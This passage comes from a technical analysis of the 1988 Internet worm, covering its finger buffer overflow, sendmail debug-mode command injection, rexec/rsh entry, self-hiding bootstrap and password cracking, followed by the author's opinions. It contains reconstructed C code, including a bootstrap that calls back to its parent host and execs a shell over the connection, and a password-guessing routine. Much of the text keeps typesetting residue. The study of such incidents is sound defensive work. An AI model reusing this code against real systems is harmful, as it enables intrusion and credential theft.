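        write(s, passwd, strlen(passwd) + 1);     /* cleartext password */
        write(s, cmd, strlen(cmd) + 1);           /* command to run remotely */

        if (read(s, &answer, 1) != 1 || answer != 0) {
            close(s);
            return -1;                            /* authentication failed */
        }
        /* s is now connected to the remote command's input and output. */
        return s;
    }

The worm's rexec attack amounts to a call like this with the guessed password and a command that starts a remote command interpreter.
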
Strengthening these network services is far more problematic than fixing finger and sendmail, unfortunately.  Users don't like the inconvenience of typing their password when logging in on a trusted local host, and they don't want to remember different passwords for each of the many hosts they may have to deal with.  Some of the solutions may be worse than the disease--for example, a user who is forced to deal with many passwords is more likely to write them down somewhere.

4.5.2. Finger

gets was removed from our [C library] a couple days ago.  [Bill Cheswick at AT&T Bell Labs Research, private communication, 11/9/88]

Probably the neatest hack in the worm is its co-opting of the TCP finger service to gain entry to a system.  Finger reports information about a user on a host, usually including things like the user's full name, where their office is, the number of their phone extension and so on.  The Berkeley[3] version of the finger server is a really trivial program: it reads a request from the originating host, then runs the local finger program with the request as an argument and ships the output back.  Unfortunately the finger server reads the remote request with gets(), a standard C library routine that dates from the dawn of time and which does not check for overflow of the server's 512 byte request buffer on the stack.  The worm supplies the finger server with a request that is 536 bytes long; the bulk of the request is some VAX machine code that asks the system to execute the command interpreter sh, and the extra 24 bytes represent just enough data to write over the server's stack frame for the main routine.  When the main routine of the server exits, the calling function's program counter is supposed to be restored from the stack, but the worm wrote over this program counter with one that points to the VAX code in the request buffer.  The program jumps to the worm's code and runs the command interpreter, which the worm uses to enter its bootstrap.

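The heart of the vulnerability is a pattern like the one below.  This is a schematic reconstruction of the server's input handling, not the actual finger server source; the fgets() call shown in the comment is the sort of repair that was applied afterward.

    #include <stdio.h>

    int
    main(void)
    {
        char line[512];

        /* The fatal call: gets() has no idea how big "line" is, so a
         * request longer than 512 bytes simply keeps writing up the
         * stack, over the saved frame and return address.
         *
         * The repaired servers used something like
         *     fgets(line, sizeof(line), stdin);
         * which cannot overrun the buffer. */
        if (gets(line) == NULL)
            return 1;

        printf("would now run: finger %s\n", line);  /* stand-in for the real work */
        return 0;
    }
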
Not surprisingly, shortly after the worm was reported to use this feature of gets(), a number of people replaced all instances of gets() in system code with sensible code that checks the length of the buffer.  Some even went so far as to remove gets() from the library, although the function is apparently mandated by the forthcoming ANSI C standard[4].  So far no one has claimed to have exercised the finger server bug before the worm incident, but in May 1988, students at UC Santa Cruz apparently penetrated security using a different finger server with a similar bug.  The system administrator at UCSC noticed that the Berkeley finger server had a similar bug and sent mail to Berkeley, but the seriousness of the problem was not appreciated at the time (Jim Haynes, private communication).

One final note: the worm is meticulous in some areas but not in others.  From what we can tell, there was no Sun-3 version of the finger intrusion even though the Sun-3 server was just as vulnerable as the VAX one.  Perhaps the author had VAX sources available but not Sun sources?

____________________
[3] Actually, like much of the code in the Berkeley distribution, the finger server was contributed from elsewhere; in this case, it appears that MIT was the source.
[4] See for example Appendix B, section 1.4 of the second edition of The C Programming Language by Kernighan and Ritchie.

4.5.3. Sendmail

[T]he trap door resulted from two distinct `features' that, although innocent by themselves, were deadly when combined (kind of like binary nerve gas).  [Eric Allman, personal communication, 11/22/88]

The sendmail attack is perhaps the least preferred in the worm's arsenal, but in spite of that one site at Utah was subjected to nearly 150 sendmail attacks on Black Thursday.  Sendmail is the program that provides the SMTP mail service on TCP networks for Berkeley UNIX systems.  It uses a simple character-oriented protocol to accept mail from remote sites.  One feature of sendmail is that it permits mail to be delivered to processes instead of mailbox files; this can be used with (say) the vacation program to notify senders that you are out of town and are temporarily unable to respond to their mail.  Normally this feature is only available to recipients.  Unfortunately a little loophole was accidentally created when a couple of earlier security bugs were being fixed--if sendmail is compiled with the DEBUG flag, and the sender at runtime asks that sendmail enter debug mode by sending the debug command, it permits senders to pass in a command sequence instead of a user name for a recipient.  Alas, most versions of sendmail are compiled with DEBUG, including the one that Sun sends out in its binary distribution.  The worm mimics a remote SMTP connection, feeding in /dev/null as the name of the sender and a carefully crafted string as the recipient.  The string sets up a command that deletes the header of the message and passes the body to a command interpreter.  The body contains a copy of the worm bootstrap source plus commands to compile and run it.  After the worm finishes the protocol and closes the connection to sendmail, the bootstrap will be built on the remote host and the local worm waits for its connection so that it can complete the process of building a new worm.

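The shape of such a session can be suggested in a few lines.  The recipient string and message body below are illustrative reconstructions of the technique just described, with placeholders where the worm supplied its bootstrap source and its call-back parameters; they are not the worm's literal commands.

    #include <stdio.h>

    /* The SMTP commands a debug-mode attack would issue, in order.  The
     * ``recipient'' is a pipeline rather than a user name: it strips the
     * mail header and hands the body to a shell.  The body itself would
     * carry the bootstrap source and the commands to compile and run it. */
    static const char *dialogue[] = {
        "debug",
        "mail from: </dev/null>",
        "rcpt to: <\"| sed -e '1,/^$/d' | /bin/sh\">",
        "data",
        "cd /usr/tmp",
        "cat > bootstrap.c << 'EOF'",
        "... 99-line bootstrap source goes here ...",
        "EOF",
        "cc -o bootstrap bootstrap.c; ./bootstrap <address> <port> <magic>",
        ".",
        "quit",
        NULL,
    };

    int
    main(void)
    {
        int i;

        /* A real attack would write these lines down a TCP connection to
         * the victim's SMTP port (25); here we merely print them. */
        for (i = 0; dialogue[i] != NULL; i++)
            printf("%s\n", dialogue[i]);
        return 0;
    }
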
Of course this is not the first time that an inadvertent loophole or ``trap door'' like this has been found in sendmail, and it may not be the last.  In his Turing Award lecture, Ken Thompson said: ``You can't trust code that you did not totally create yourself.  (Especially code from companies that employ people like me.)''  In fact, as Eric Allman says, ``[Y]ou can't even trust code that you did totally create yourself.''  The basic problem of trusting system programs is not one that is easy to solve.

4.6. Infection

The worm uses two favorite routines when it decides that it wants to infect a host.  One routine that we named infect() is used from host scanning routines like hg().  infect() first checks that it isn't infecting the local machine, an already infected machine or a machine previously attacked but not successfully infected; the ``infected'' and ``immune'' states are marked by flags on a host structure when attacks succeed or fail, respectively.  The worm then makes sure that it can get an address for the target host, marking the host immune if it can't.  Then comes a series of attacks: first by rsh from the account that the worm is running under, then through finger, then through sendmail.  If infect() fails, it marks the host as immune.

The other infection routine is named hu1() and it is run from the password cracking code after a password has been guessed.  hu1(), like infect(), makes sure that it's not re-infecting a host, then it checks for an address.  If a potential remote user name is available from a .forward or .rhosts file, the worm checks it to make sure it is reasonable--it must contain no punctuation or control characters.  If a remote user name is unavailable the worm uses the local user name.  Once the worm has a user name and a password, it contacts the rexec server on the target host and tries to authenticate itself.  If it can, it proceeds to the bootstrap phase; otherwise, it tries a slightly different approach--it connects to the local rexec server with the local user name and password, then uses this command interpreter to fire off a command interpreter on the target machine with rsh.  This will succeed if the remote host says it trusts the local host in its /etc/hosts.equiv file, or the remote account says it trusts the local account in its .rhosts file.  hu1() ignores infect()'s ``immune'' flag and does not set this flag itself, since hu1() may find success on a per-account basis that infect() can't achieve on a per-host basis.

Both infect() and hu1() use a routine we call sendworm() to do their dirty work[5].  sendworm() looks for the l1.c bootstrap source file in its objects list, then it uses the makemagic() routine to get a communication stream endpoint (a socket), a random network port number to rendezvous at, and a magic number for authentication.  (There is an interesting side effect to makemagic()--it looks for a usable address for the target host by trying to connect to its TCP telnet port; this produces a characteristic log message from the telnet server.)  If makemagic() was successful, the worm begins to send commands to the remote command interpreter that was started up by the immediately preceding attack.  It changes its directory to an unprotected place (/usr/tmp), then it sends across the bootstrap source, using the UNIX stream editor sed to parse the input stream.  The bootstrap source is compiled and run on the remote system, and the worm runs a routine named waithit() to wait for the remote bootstrap to call back on the selected port.

____________________
[5] One minor exception: the sendmail attack doesn't use sendworm() since it needs to handle the SMTP protocol in addition to the command interpreter interface, but the principle is the same.

The bootstrap is quite simple.  It is supplied the address of the originating host, a TCP port number and a magic number as arguments.  When it starts, it unlinks itself so that it can't be detected in the filesystem, then it calls fork() to create a new process with the same image.  The old process exits, permitting the originating worm to continue with its business.  The bootstrap reads its arguments then zeroes them out to hide them from the system status program; then it is ready to connect over the network to the parent worm.  When the connection is made, the bootstrap sends over the magic number, which the parent will check against its own copy.  If the parent accepts the number (which is carefully rendered to be independent of host byte order), it will send over a series of filenames and files which the bootstrap writes to disk.  If trouble occurs, the bootstrap removes all these files and exits.  Eventually the transaction completes, and the bootstrap calls up a command interpreter to finish the job.

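A sketch of the bootstrap's logic, reconstructed from this description rather than copied from l1.c, might read as follows.  The file-transfer framing shown (a length followed by contents) is our assumption; the real bootstrap also receives file names from its parent.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>

    int
    main(int argc, char **argv)
    {
        int s, n, nfiles;
        long len;
        unsigned int nlen, magic;
        char name[64], buf[2048];
        struct sockaddr_in sin;
        FILE *fp;

        if (argc < 4)
            exit(1);

        unlink(argv[0]);                     /* vanish from the filesystem */
        if (fork() != 0)                     /* let the remote shell return */
            exit(0);

        /* Arguments: the parent's address, a rendezvous port and a magic
         * number.  Zero them afterward so "ps" shows nothing useful. */
        memset(&sin, 0, sizeof(sin));
        sin.sin_family = AF_INET;
        sin.sin_addr.s_addr = inet_addr(argv[1]);
        sin.sin_port = htons((unsigned short) atoi(argv[2]));
        magic = htonl((unsigned int) atol(argv[3]));
        for (n = 1; n < argc; n++)
            memset(argv[n], 0, strlen(argv[n]));

        s = socket(AF_INET, SOCK_STREAM, 0);
        if (connect(s, (struct sockaddr *) &sin, sizeof(sin)) < 0)
            exit(1);
        write(s, &magic, sizeof(magic));     /* authenticate to the parent */

        /* Receive the worm's support files.  We assume a simple framing:
         * a length in network byte order (zero meaning "done") followed
         * by that many bytes. */
        for (nfiles = 0; ; nfiles++) {
            if (read(s, &nlen, sizeof(nlen)) != sizeof(nlen))
                exit(1);
            if ((len = (long) ntohl(nlen)) == 0)
                break;
            sprintf(name, "x%d.%d", (int) getpid(), nfiles);
            if ((fp = fopen(name, "w")) == NULL)
                exit(1);
            while (len > 0) {
                n = read(s, buf, len > (long) sizeof(buf) ? sizeof(buf) : (size_t) len);
                if (n <= 0)
                    exit(1);        /* the real bootstrap unlinks its files here */
                fwrite(buf, 1, (size_t) n, fp);
                len -= n;
            }
            fclose(fp);
        }

        /* Hand control to a command interpreter reading from the network,
         * so the parent worm can drive the compilation of a new worm. */
        dup2(s, 0);
        dup2(s, 1);
        dup2(s, 2);
        execl("/bin/sh", "sh", (char *) 0);
        exit(1);
    }
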
In the meantime, the parent in waithit() spends up to two minutes waiting for the bootstrap to call back; if the bootstrap fails to call back, or the authentication fails, the worm decides to give up and reports a failure.  When a connection is successful, the worm ships all of its files across followed by an end-of-file indicator.  It pauses four seconds to let a command interpreter start on the remote side, then it issues commands to create a new worm.  For each relocatable object file in the list of files, the worm tries to build an executable object; typically each file contains code for a particular make of computer, and the builds will fail until the worm tries the proper computer type.  If the parent worm finally gets an executable child worm built, it sets it loose with the -p option to kill the command interpreter, then shuts down the connection.  The target host is marked ``infected''.  If none of the objects produces a usable child worm, the parent removes the detritus and waithit() returns an error indication.

When a system is being swamped by worms, the /usr/tmp directory can fill with leftover files as a consequence of a bug in waithit().  If a worm compile takes more than 30 seconds, resynchronization code will report an error but waithit() will fail to remove the files it has created.  On one of our machines, 13 MB of material representing 86 sets of files accumulated over 5.5 hours.

4.7. Password cracking

A password cracking algorithm seems like a slow and bulky item to put in a worm, but the worm makes this work by being persistent and efficient.  The worm is aided by some unfortunate statistics about typical password choices.  Here we discuss how the worm goes about choosing passwords to test and how the UNIX password encryption routine was modified.

4.7.1. Guessing passwords

For example, if the login name is ``abc'', then ``abc'', ``cba'', and ``abcabc'' are excellent candidates for passwords.  [Grampp and Morris, ``UNIX Operating System Security'']

The worm's password guessing is driven by a little 4-state machine.  The first state gathers password data, while the remaining states represent increasingly less likely sources of potential passwords.  The central cracking routine is called cracksome(), and it contains a switch on each of the four states.

The routine that implements the first state we named
|
|
_ c_ r_ a_ c_ k__ 0(). This routine's job is to collect information about
|
|
hosts and accounts. It is only run once; the information it
|
|
gathers persists for the lifetime of the worm. Its implementa-
|
|
tion is straightforward: it reads the files /_ e_ t_ c/_ h_ o_ s_ t_ s._ e_ q_ u_ i_ v and
|
|
/._ r_ h_ o_ s_ t_ s for hosts to attack, then reads the password file look-
|
|
ing for accounts. For each account, the worm saves the name, the
|
|
encrypted password, the home directory and the user information
|
|
fields. As a quick preliminary check, it looks for a ._ f_ o_ r_ w_ a_ r_ d
|
|
file in each user's home directory and saves any host name it
|
|
finds in that file, marking it like the previous ones.
|
|
|
|
We unimaginatively called the function for the next state
_ c_ r_ a_ c_ k__ 1().  _ c_ r_ a_ c_ k__ 1() looks for trivially broken passwords.
These are passwords which can be guessed merely on the basis of
information already contained in the password file.  Grampp and
Morris report a survey of over 100 password files where between 8
and 30 percent of all passwords were guessed using just the
literal account name and a couple of variations.  The worm tries
a little harder than this: it checks the null password, the
account name, the account name concatenated with itself, the
first name (extracted from the user information field, with the
first letter mapped to lower case), the last name, and the
account name reversed.  It runs through up to 50 accounts per
call to _ c_ r_ a_ c_ k_ s_ o_ m_ e(), saving its place in the list of accounts and
advancing to the next state when it runs out of accounts to try.

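The guess list for one account is short enough to write out.  The
fragment below generates the six guesses just described; the
argument list, buffer sizes and ordering are assumptions, and the
real _ c_ r_ a_ c_ k__ 1() interleaves this work with its 50-accounts-per-call
bookkeeping.

    /* Generate the six trivial guesses for one account (sketch only). */
    #include <ctype.h>
    #include <stdio.h>
    #include <string.h>

    #define NGUESS 6
    #define GLEN   64

    void
    trivial_guesses(const char *acct, const char *first, const char *last,
                    char guess[NGUESS][GLEN])
    {
        int i, n;

        snprintf(guess[0], GLEN, "%s", "");          /* the null password */
        snprintf(guess[1], GLEN, "%s", acct);        /* account name */
        snprintf(guess[2], GLEN, "%s%s", acct, acct);/* name doubled */
        snprintf(guess[3], GLEN, "%s", first);       /* first name ... */
        if (guess[3][0] != '\0')                     /* ... lower-cased */
            guess[3][0] = (char)tolower((unsigned char)guess[3][0]);
        snprintf(guess[4], GLEN, "%s", last);        /* last name */
        n = (int)strlen(acct);                       /* account name reversed */
        if (n >= GLEN)
            n = GLEN - 1;
        for (i = 0; i < n; i++)
            guess[5][i] = acct[n - 1 - i];
        guess[5][n] = '\0';
    }
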
The next state is handled by _ c_ r_ a_ c_ k__ 2().  In this state the
worm compares a list of favorite passwords, one password per
call, with all of the encrypted passwords in the password file.
The list contains 432 words, most of which are real English words
or proper names; it seems likely that this list was generated by
stealing password files and cracking them at leisure on the worm
author's home machine.  A global variable _ n_ e_ x_ t_ w is used to count
the number of passwords tried, and it is this count (plus a loss
in the population control game) that controls whether the worm
exits at the end of the main loop--_ n_ e_ x_ t_ w must be greater than 10
before the worm can exit.  Since the worm normally spends 2.5
minutes checking for clients over the course of the main loop and
calls _ c_ r_ a_ c_ k_ s_ o_ m_ e() twice in that period, it appears that the worm
must make a minimum of 7 passes through the main loop, taking
more than 15 minutes[6].  It will take at least 9 hours for the
worm to scan its built-in password list and proceed to the next
state.

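That 9-hour figure follows directly from the numbers just given;
the little program below merely spells the arithmetic out,
assuming the 2.5-minute pass time and the two calls to
_ c_ r_ a_ c_ k_ s_ o_ m_ e() per pass stated above.

    /* Back-of-the-envelope check of the 9-hour estimate above. */
    #include <stdio.h>

    int
    main(void)
    {
        double words = 432.0;           /* size of the built-in list */
        double per_pass = 2.0;          /* words tried per main-loop pass */
        double minutes_per_pass = 2.5;  /* time spent listening for clients */
        double minutes = words / per_pass * minutes_per_pass;

        printf("%.0f minutes, or %.1f hours\n", minutes, minutes / 60.0);
        return 0;                       /* prints 540 minutes, or 9.0 hours */
    }
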
The last state is handled by _ c_ r_ a_ c_ k__ 3().  It opens the UNIX
online dictionary /_ u_ s_ r/_ d_ i_ c_ t/_ w_ o_ r_ d_ s and goes through it one word at
a time.  If a word is capitalized, the worm tries a lower-case
version as well.  This search can essentially go on forever: it
would take something like four weeks for the worm to finish a
typical dictionary like ours.

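The dictionary pass is easy to picture.  The sketch below shows
the general idea only: the real _ c_ r_ a_ c_ k__ 3() keeps its place in the
file between calls rather than scanning it in one sitting, and
try_guess() here simply stands in for handing a word to the
password checking machinery.

    /* Sketch of the /usr/dict/words scan described above. */
    #include <ctype.h>
    #include <stdio.h>
    #include <string.h>

    extern void try_guess(const char *word);   /* assumed checker */

    void
    dictionary_pass(void)
    {
        FILE *fp = fopen("/usr/dict/words", "r");
        char word[128];

        if (fp == NULL)
            return;
        while (fgets(word, sizeof(word), fp) != NULL) {
            word[strcspn(word, "\n")] = '\0';       /* strip the newline */
            try_guess(word);
            if (isupper((unsigned char)word[0])) {  /* "Word" gets "word" too */
                word[0] = (char)tolower((unsigned char)word[0]);
                try_guess(word);
            }
        }
        fclose(fp);
    }
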
When the worm selects a potential password, it passes it to
a routine we called _ t_ r_ y__ p_ a_ s_ s_ w_ o_ r_ d().  This function calls the
worm's special version of the UNIX password encryption function
_ c_ r_ y_ p_ t() and compares the result with the target account's actual
encrypted password.  If they are equal, or if the password and
guess are the null string (no password), the worm saves the
cleartext password and proceeds to attack hosts that are con-
nected to this account.  A routine we called
_ t_ r_ y__ f_ o_ r_ w_ a_ r_ d__ a_ n_ d__ r_ h_ o_ s_ t_ s() reads the user's ._ f_ o_ r_ w_ a_ r_ d and ._ r_ h_ o_ s_ t_ s
files, calling the previously described _ h_ u_ 1() function for each
remote account it finds.

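The comparison itself is a one-liner around the encryption
routine.  The sketch below uses the standard library _ c_ r_ y_ p_ t()
rather than the worm's fast version, and the account structure
and field sizes are assumptions; only the shape of the check
follows the description above.

    /* Sketch of the password check described above (standard crypt()). */
    #include <string.h>

    extern char *crypt(const char *key, const char *salt);

    struct account {
        char name[9];
        char encrypted[14];   /* 13-character crypt() output plus NUL */
        char cleartext[32];   /* filled in when a guess succeeds */
    };

    int
    try_password(struct account *acct, const char *guess)
    {
        /* An empty stored password matches an empty guess immediately. */
        if (acct->encrypted[0] == '\0' && guess[0] == '\0') {
            acct->cleartext[0] = '\0';
            return 1;
        }
        /* crypt() takes the stored password as the salt source: its
         * first two characters select one of 4096 perturbations of DES. */
        if (strcmp(crypt(guess, acct->encrypted), acct->encrypted) == 0) {
            strncpy(acct->cleartext, guess, sizeof(acct->cleartext) - 1);
            acct->cleartext[sizeof(acct->cleartext) - 1] = '\0';
            return 1;   /* caller goes on to try .forward and .rhosts hosts */
        }
        return 0;
    }
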
____________________
[6] For those mindful of details: The first call to _ c_ r_ a_ c_ k_ s_ o_ m_ e()
is consumed reading system files.  The worm must spend at
least one call to _ c_ r_ a_ c_ k_ s_ o_ m_ e() in the second state attacking
trivial passwords.  This accounts for at least one pass through
the main loop.  In the third state, _ c_ r_ a_ c_ k_ s_ o_ m_ e() tests one pass-
word from its list of favorites on each call; the worm will exit
if it lost a roll of the dice and more than ten words have been
checked, so this accounts for at least six loops, two words on
each loop for five loops to reach 10 words, then another loop to
pass that number.  Altogether this amounts to a minimum of 7
loops.  If all 7 loops took the maximum amount of time waiting
for clients, this would require a minimum of 17.5 minutes, but
the 2-minute check can exit early if a client connects and the
server loses the challenge, hence 15.5 minutes of waiting time
plus runtime overhead is the minimum lifetime.  In this period a
worm will attack at least 8 hosts through the host infection rou-
tines, and will try about 18 passwords for each account, attack-
ing more hosts if accounts are cracked.

_ 4._ 7._ 2. _ F_ a_ s_ t_ e_ r _ p_ a_ s_ s_ w_ o_ r_ d _ e_ n_ c_ r_ y_ p_ t_ i_ o_ n

The use of encrypted passwords appears reasonably secure
in the absence of serious attention of experts in the
field.  [Morris and Thompson, ``Password Security: A Case
History'']

Unfortunately some experts in the field have been giving
serious attention to fast implementations of the UNIX password
encryption algorithm.  UNIX password authentication works without
putting any readable version of the password onto the system, and
indeed works without protecting the encrypted password against
reading by users on the system.  When a user types a password in
the clear, the system encrypts it using the standard _ c_ r_ y_ p_ t()
library routine, then compares it against a saved copy of the
encrypted password.  The encryption algorithm is meant to be
basically impossible to invert, preventing the retrieval of pass-
words by examining only the encrypted text, and it is meant to be
expensive to run, so that testing guesses will take a long time.
The UNIX password encryption algorithm is based on the Federal
Data Encryption Standard (DES).  Currently no one knows how to
invert this algorithm in a reasonable amount of time, and while
fast DES encoding chips are available, the UNIX version of the
algorithm is slightly perturbed so that it is impossible to use a
standard DES chip to implement it.

Two problems have been working against the UNIX implemen-
tation of DES.  Computers are continually increasing in speed--
current machines are typically several times faster than the
machines that were available when the current password scheme was
invented.  At the same time, ways have been discovered to make
software DES run faster.  UNIX passwords are now far more suscep-
tible to persistent guessing, particularly if the encrypted pass-
words are already known.  The worm's version of the UNIX _ c_ r_ y_ p_ t()
routine ran more than 9 times faster than the standard version
when we tested it on our VAX 8600.  While the standard _ c_ r_ y_ p_ t()
takes 54 seconds to encrypt 271 passwords on our 8600 (the number
of passwords actually contained in our password file), the worm's
_ c_ r_ y_ p_ t() takes less than 6 seconds.

The worm's _ c_ r_ y_ p_ t() algorithm appears to be a compromise
between time and space: the time needed to encrypt one password
guess versus the substantial extra table space needed to squeeze
performance out of the algorithm.  Curiously, one performance
improvement actually saves a little space.  The traditional UNIX
algorithm stores each bit of the password in a byte, while the
worm's algorithm packs the bits into two 32-bit words.  This per-
mits the worm's algorithm to use bit-field and shift operations
on the password data, which is immensely faster.  Other speedups
include unrolling loops, combining tables, precomputing shifts
and masks, and eliminating redundant initial and final permuta-
tions when performing the 25 applications of modified DES that
the password encryption algorithm uses.  The biggest performance
improvement comes as a result of combining permutations: the worm
uses expanded arrays which are indexed by groups of bits rather
than the single bits used by the standard algorithm.  Matt
Bishop's fast version of _ c_ r_ y_ p_ t() does all of these things and
also precomputes even more functions, yielding twice the perfor-
mance of the worm's algorithm but requiring nearly 200 KB of ini-
tialized data as opposed to the 6 KB used by the worm and the
less than 2 KB used by the normal _ c_ r_ y_ p_ t().

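The packing change is easy to picture.  The sketch below shows
only the general idea--dense key bits in two 32-bit halves
instead of one byte per bit; the actual bit ordering and table
layout inside the worm's _ c_ r_ y_ p_ t() are not reproduced here.

    /* Illustrative packing of the 56 password-derived key bits. */
    #include <stdint.h>

    struct packed_key {
        uint32_t lo;   /* bits 0-27  */
        uint32_t hi;   /* bits 28-55 */
    };

    struct packed_key
    pack_key(const char *password)
    {
        struct packed_key k = { 0, 0 };
        int bit = 0, i, j;

        /* Take the low 7 bits of each of the first 8 characters (the
         * classic crypt() key input) and pack them densely, so later
         * steps can use shifts and masks instead of byte loops. */
        for (i = 0; i < 8 && password[i] != '\0'; i++) {
            for (j = 6; j >= 0; j--, bit++) {
                int b = (password[i] >> j) & 1;
                if (bit < 28)
                    k.lo |= (uint32_t)b << bit;
                else
                    k.hi |= (uint32_t)b << (bit - 28);
            }
        }
        return k;
    }
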
How can system administrators defend against fast implemen-
tations of _ c_ r_ y_ p_ t()?  One suggestion that has been introduced for
foiling the bad guys is the idea of shadow password files.  In
this scheme, the encrypted passwords are hidden rather than pub-
lic, forcing a cracker to either break a privileged account or
use the host's CPU and (slow) encryption algorithm to attack,
with the added danger that password test requests could be logged
and password cracking discovered.  The disadvantage of shadow
password files is that if the bad guys somehow get around the
protections for the file that contains the actual passwords, all
of the passwords must be considered cracked and will need to be
replaced.  Another suggestion has been to replace the UNIX DES
implementation with the fastest available implementation, but run
it 1000 times or more instead of the 25 times used in the UNIX
_ c_ r_ y_ p_ t() code.  Unless the repeat count is somehow pegged to the
fastest available CPU speed, this approach merely postpones the
day of reckoning until the cracker finds a faster machine.  It's
interesting to note that Morris and Thompson measured the time to
compute the old M-209 (non-DES) password encryption algorithm
used in early versions of UNIX on the PDP-11/70 and found that a
good implementation took only 1.25 milliseconds per encryption,
which they deemed insufficient; currently the VAX 8600 using Matt
Bishop's DES-based algorithm needs 11.5 milliseconds per encryp-
tion, and machines 10 times faster than the VAX 8600 at a cheaper
price will be available soon (if they aren't already!).

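The ``run it many more times'' suggestion amounts to nothing more
than a loop around the basic primitive.  The fragment below is a
sketch of that idea only; des_block() stands in for one
application of the salt-perturbed DES and is an assumed helper,
not a real library routine.

    /* Sketch of an iterated, deliberately slow password hash. */
    #include <stdint.h>

    extern void des_block(uint64_t key, uint64_t *block);   /* assumed */

    uint64_t
    slow_hash(uint64_t key, int rounds)
    {
        uint64_t block = 0;   /* crypt() likewise starts from a constant block */
        int i;

        /* The standard crypt() applies its modified DES 25 times; raising
         * the count to 1000 or more slows every guess, for the attacker
         * and for login alike, unless the count tracks CPU speed. */
        for (i = 0; i < rounds; i++)
            des_block(key, &block);
        return block;
    }
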
_ 5. _ O_ p_ i_ n_ i_ o_ n_ s

The act of breaking into a computer system has to have
the same social stigma as breaking into a neighbor's
house.  It should not matter that the neighbor's door is
unlocked.  [Ken Thompson, 1983 Turing Award Lecture]

[Creators of viruses are] stealing a car for the purpose
of joyriding.  [R H Morris, in 1983 Capitol Hill tes-
timony, cited in the New York Times 11/11/88]

I don't propose to offer definitive statements on the moral-
ity of the worm's author, the ethics of publishing security
information or the security needs of the UNIX computing commun-
ity, since people better (and less) qualified than I are still
copiously flaming on these topics in the various network
newsgroups and mailing lists.  For the sake of the mythical ordi-
nary system administrator who might have been confused by all the
information and misinformation, I will try to answer a few of the
most relevant questions in a narrow but useful way.

_ D_ i_ d _ t_ h_ e _ w_ o_ r_ m _ c_ a_ u_ s_ e _ d_ a_ m_ a_ g_ e?  The worm did not destroy files,
intercept private mail, reveal passwords, corrupt databases or
plant trojan horses.  It did compete for CPU time with, and even-
tually overwhelm, ordinary user processes.  It used up limited
system resources such as the open file table and the process text
table, causing user processes to fail for lack of same.  It
caused some machines to crash by operating them close to the lim-
its of their capacity, exercising bugs that do not appear under
normal loads.  It forced administrators to perform one or more
reboots to clear worms from the system, terminating user sessions
and long-running jobs.  It forced administrators to shut down
network gateways, including gateways between important nation-
wide research networks, in an effort to isolate the worm; this
led to delays of up to several days in the exchange of electronic
mail, causing some projects to miss deadlines and others to lose
valuable research time.  It made systems staff across the country
drop their ongoing hacks and work 24-hour days trying to corner
and kill worms.  It caused members of management in at least one
institution to become so frightened that they scrubbed all the
disks at their facility that were online at the time of the
infection, and limited reloading of files to data that was verif-
iably unmodified by a foreign agent.  It caused bandwidth through
gateways that were still running after the infection started to
become substantially degraded--the gateways were using much of
their capacity just shipping the worm from one network to
another.  It penetrated user accounts and made it appear that a
given user was disturbing a system when in fact they were not
responsible.  It's true that the worm could have been far more
harmful than it actually turned out to be: in the last few
weeks, several security bugs have come to light which the worm
could have used to thoroughly destroy a system.  Perhaps we
should be grateful that we escaped incredibly awful consequences,
and perhaps we should also be grateful that we have learned so
much about the weaknesses in our systems' defenses, but I think
we should share our gratefulness with someone other than the
worm's author.

_ W_ a_ s _ t_ h_ e _ w_ o_ r_ m _ m_ a_ l_ i_ c_ i_ o_ u_ s?  Some people have suggested that the
worm was an innocent experiment that got out of hand, and that it
was never intended to spread so fast or so widely.  We can find
evidence in the worm to support and to contradict this
hypothesis.  There are a number of bugs in the worm that appear
to be the result of hasty or careless programming.  For example,
in the worm's _ i_ f__ i_ n_ i_ t() routine, there is a call to the block
zero function _ b_ z_ e_ r_ o() that incorrectly uses the block itself
rather than the block's address as an argument.  It's also possi-
ble that a bug was responsible for the ineffectiveness of the
population control measures used by the worm.  This could be seen
as evidence that a development version of the worm ``got loose''
accidentally, and perhaps the author originally intended to test
the final version under controlled conditions, in an environment
from which it would not escape.  On the other hand, there is con-
siderable evidence that the worm was designed to reproduce
quickly and spread itself over great distances.  It can be argued
that the population control hacks in the worm are anemic by
design: they are a compromise between spreading the worm as
quickly as possible and raising the load enough to be detected
and defeated.  A worm will exist for a substantial amount of time
and will perform a substantial amount of work even if it loses
the roll of the (imaginary) dice; moreover, 1 in 7 worms become
immortal and can't be killed by dice rolls.  There is ample evi-
dence that the worm was designed to hamper efforts to stop it
even after it was identified and captured.  It certainly suc-
ceeded in this, since it took almost a day before the last mode
of infection (the _ f_ i_ n_ g_ e_ r server) was identified, analyzed and
reported widely; the worm was very successful in propagating
itself during this time even on systems which had fixed the _ s_ e_ n_ d_ -
_ m_ a_ i_ l debug problem and had turned off _ r_ e_ x_ e_ c.  Finally, there is
evidence that the worm's author deliberately introduced the worm
to a foreign site that was left open and welcome to casual out-
side users, rather ungraciously abusing this hospitality.  He
apparently further abused this trust by deleting a log file that
might have revealed information that could link his home site
with the infection.  I think the innocence lies in the research
community rather than with the worm's author.

_ W_ i_ l_ l _ p_ u_ b_ l_ i_ c_ a_ t_ i_ o_ n _ o_ f _ w_ o_ r_ m _ d_ e_ t_ a_ i_ l_ s _ f_ u_ r_ t_ h_ e_ r _ h_ a_ r_ m _ s_ e_ c_ u_ r_ i_ t_ y?  In
a sense, the worm itself has solved that problem: it has pub-
lished itself by sending copies to hundreds or thousands of
machines around the world.  Of course a bad guy who wants to use
the worm's tricks would have to go through the same effort that
we went through in order to understand the program, but then it
only took us a week to completely decompile the program, so while
it takes fortitude to hack the worm, it clearly is not greatly
difficult for a decent programmer.  One of the worm's most effec-
tive tricks was advertised when it entered--the bulk of the _ s_ e_ n_ d_ -
_ m_ a_ i_ l hack is visible in the log file, and a few minutes' work
with the sources will reveal the rest of the trick.  The worm's
fast password algorithm could be useful to the bad guys, but at
least two other faster implementations have been available for a
year or more, so it isn't very secret, or even very original.
Finally, the details of the worm have been well enough sketched
out on various newsgroups and mailing lists that the principal
hacks are common knowledge.  I think it's more important that we
understand what happened, so that we can make it less likely to
happen again, than that we spend time in a futile effort to hide
the issue from everyone but the bad guys.  Fixes for both source
and binary distributions are widely available, and anyone who
runs a system with these vulnerabilities needs to look into
these fixes immediately, if they haven't done so already.

_ 6. _ C_ o_ n_ c_ l_ u_ s_ i_ o_ n

It has raised the public awareness to a considerable de-
gree.  [R H Morris, quoted in the New York Times 11/5/88]

This quote is one of the understatements of the year.  The
worm story was on the front page of the New York Times and other
newspapers for days.  It was the subject of television and radio
